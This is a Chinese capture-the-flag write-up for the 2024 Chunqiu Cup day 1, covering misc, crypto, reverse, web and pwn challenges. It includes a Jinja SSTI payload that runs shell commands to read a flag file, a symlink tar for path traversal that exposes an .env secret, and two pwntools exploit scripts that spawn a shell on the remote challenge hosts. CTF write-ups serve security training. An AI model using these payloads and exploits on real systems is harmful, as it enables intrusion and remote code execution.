2024春秋杯day1 WP

admin

139887
文章

114
评论

2025年2月12日23:07:08评论14 views字数 5025阅读16分45秒阅读模式

Misc

See anything in these pics?

爆破压缩包，密码是5FIVE

Foremost提取出来一张黑色的png

然后爆破宽高，我用的是https://github.com/AabyssZG/Deformed-Image-Restorer

2024春秋杯day1 WP

简单镜像提取

使用神秘小工具一键导出所有文件

2024春秋杯day1 WP

出来一个zip，解压得到img，用rrstudio恢复之后得到一个xls，打开得到flag：flag{E7A10C15E26AA5750070EF756AAA1F7C}

压力大，写个脚本吧

用下面的脚本直接批量解压

import zipfileimport osimport base64current_dir = os.getcwd()for i inrange(99, 0, -1):password_file = os.path.join(current_dir, f"password_{i}.txt")zip_file = os.path.join(current_dir, f"zip_{i}.zip")withopen(password_file, "r") as f:encoded_password = f.read().strip()password = base64.b64decode(encoded_password).decode("utf-8")  #with zipfile.ZipFile(zip_file) as zf:zf.extractall(path=current_dir, pwd=password.encode("utf-8"))

然后合并全部txt，删掉最后的FGFGFG，再base64解码，最后16进制转图片得到一个二维码

https://rd.wechat.com/qrcode/confirm?block_type=101&content=flag%7B%5FPASSWORDs%5Fis%5Ffl%40g%21%5F%7D

2024春秋杯day1 WP

简单算术

异或

Crypto

你是小哈斯?

Sha1，直接爆破就行，我驯服GPT写的

4a0a19218e082a343a1b17e5333409af9d98f0f5 => f07c342be6e560e7f43842e2e21b774e61d85f047 => l86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a54fd1711209fb1c0781092374132c66e79e2241b => g60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 => {54fd1711209fb1c0781092374132c66e79e2241b => g86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a6b0d31c0d563223024da45691584643ac78c96e8 => m58e6b3a414a1e090dfc6029add0f3555ccba127f => e53a0acfad59379b3e050338bf9f23cfc172ee787 => _84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c22ea1c649c82946aa6e479e1ffd321e4a318b1b0 => qe9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 => b53a0acfad59379b3e050338bf9f23cfc172ee787 => _042dc4512fa3d391c5170cf3aa61e6a638f84342 => ia0f1490a20d0211c997b44bc357e1972deab8ae3 => s042dc4512fa3d391c5170cf3aa61e6a638f84342 => ia0f1490a20d0211c997b44bc357e1972deab8ae3 => s53a0acfad59379b3e050338bf9f23cfc172ee787 => _84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c11f6ad8ec52a2984abaafd7c3b516503785c2072 => x95cb0bfd2977c761298d9624e4b4d4c72a39974a => y395df8f7c51f007019cb30201c49e884b46b92fa => zc2b7df6201fdd3362399091f0a29550df3505b6a => }

flag{game_cqb_isis_cxyz}

通往哈希的旅程

ca12fd8250972ec363a16593356abb1f3cf3a16d

cmd5花重金买的

18876011645

Reverse

Ezgo

爆破即可，最后密码是oadi，密码正确以后zip中的txt就可读了（有时候会失败，要重新解压重新输入密码，貌似2025也可以，应该算个非预期（？））

Web

file_copy

直接用

https://github.com/synacktiv/php_filter_chains_oracle_exploit

python3 filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path

这个只能在linux下跑，windows会报错，且Linux回显很慢

easy_flask

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/flag').read() }}

ssti注入（希望出题人声明flag位置，我/flag读不到 env也没有差点破防了）

Gotar

Tar路径穿越

先软连接构造一个恶意tar

mkdir 1

cd 1

ln -s ../../../.env 2

cd ../

tar -cf 3.tar 1

上传3.tar，得到真正的密钥，如下：

SfaVqVGfLOKk7Gp912kPe0Li47AEQM4iYNbBx1WVrWA=

看token，是个jwt

然后直接塞hackbar并读取flag

Hacker!!!Is_secret!!!（迫真jwt_secret）

Pwn

Gender_Simulation

from pwn import *binary = './pwn'elf = ELF(binary)libc = ELF('./libc.so.6')context.log_level = 'debug'context.arch = elf.archcontext.terminal = ['tmux', 'neww']send = lambda data: io.send(data)send_after = lambda delim, data: io.sendafter(delim, data)send_line = lambda data: io.sendline(data)send_line_after = lambda delim, data: io.sendlineafter(delim, data)recv = lambda num_bytes=4096: io.recv(num_bytes)recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)u32 = lambda data: u32(data.ljust(4, b'x00'))u64 = lambda data: u64(data.ljust(8, b'x00'))interactive = lambda: io.interactive()io = remote('39.106.48.123', 38698)recv_until(b'A gift: ')leaked_addr = int(recv_until(b'n'), 16)libc_base = leaked_addr - libc.sym.setvbuflog.info(f"libc_base = {hex(libc_base)}")recv_until(b'Choose onen1. Boyn2. Girln')send_line(b'2')recv_until(b'2. Tomboyn')send_line(b'2')recv_until(b'certificaten')pop_rdi = libc_base + 0x000000000010f75bret_addr = 0x000000000040201asystem_addr = libc.sym.system + libc_basebin_sh_addr = next(libc.search(b'/bin/sh')) + libc_basesend_line(p64(0x0004025E6))recv_until(b'If you think you')send(b'a' * 0x18 + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr))interactive()

Bypass

from pwn import *import timelocal_file = './pwn'elf = ELF(local_file)libc = ELF('./libc.so.6')context.log_level = 'debug'context.arch = elf.archcontext.terminal = ['tmux', 'neww']send = lambda data: io.send(data)send_after = lambda delim, data: io.sendafter(delim, data)send_line = lambda data: io.sendline(data)send_line_after = lambda delim, data: io.sendlineafter(delim, data)recv = lambda numb=4096: io.recv(numb)recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)unpack32 = lambda data: u32(data.ljust(4, b'x00'))unpack64 = lambda data: u64(data.ljust(8, b'x00'))get_qword = lambda data: (~np.uint64(data) + 1)get_dword = lambda data: (~np.uint32(data) + 1)defget_shell():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))info_address = lambda tag, addr: io.info(tag + '==>' + ': {:#x}'.format(addr))interact = lambda: io.interactive()io = remote('8.147.132.32', 39949)send(p8(2) * 4)recv_until('d')recv_until('n')libc_base = unpack64(recv(6)) - libc.sym.putssend(p8(0) * 4)one_gadget = 0x4f302send(b'KEY: ' + b'a' * 19 + p8(0x14) + p8(0x2) + b'c' * 8 + p64(one_gadget + libc_base))time.sleep(0.1)send(b'VAL: ' + b'b' * 512)interact()

团队官网：https://www.hdsec.cn/

我们在https://www.hdsec.cn/tools/intranet/intranet.html收集了大量渗透中会用到的命令，欢迎各位师傅使用

原文始发于微信公众号（黄豆安全实验室）：2024春秋杯day1 WP

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

2024春秋杯day1 WP

【CTFer成长之路】XSS的魔力

CTF - Pwn题之shellcode&栈迁移

第二届长城杯信息安全铁人三项赛（防护赛）总决赛-逆向题解

ACTF 2025 writeup by Mini-Venom

2025蓝桥杯WP（LRT）

UKFC2024 ACTF WP

ACTF 2025 Writeup by Nepnep

流量分析 - No11(解)

Web3互联网取证-2025FIC晋级赛

Zer0 Sec团队内部靶场WP

发表评论

在线咨询

微信